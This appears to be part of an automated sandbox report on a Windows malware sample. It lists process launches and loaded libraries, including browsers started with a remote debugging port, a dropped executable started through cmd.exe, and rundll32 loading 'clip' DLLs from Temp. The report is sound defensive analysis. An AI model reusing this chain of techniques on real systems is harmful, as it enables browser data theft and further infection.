Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2284,i,16948042594527943735,4818117858943620130,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6920 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6972 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDHCAECGIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsDHCAECGIEB.exe "C:\Users\user\DocumentsDHCAECGIEB.exe"
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe "C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe "C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6244 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe "C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe "C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsDHCAECGIEB.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2172,i,10839052718167675908,6568144357530153640,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2284,i,16948042594527943735,4818117858943620130,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6920 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6972 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\DocumentsDHCAECGIEB.exe "C:\Users\user\DocumentsDHCAECGIEB.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7020 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6244 --field-trial-handle=2100,i,12791048015529921744,10855682057704830667,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsDHCAECGIEB.exe "C:\Users\user\DocumentsDHCAECGIEB.exe"
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe "C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe "C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe "C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe"
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=6ca8f7e5e2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1005203011\clip.dll, Main
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=2004,i,967901057161028773,948093207211853572,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Section loaded: edputil.dll
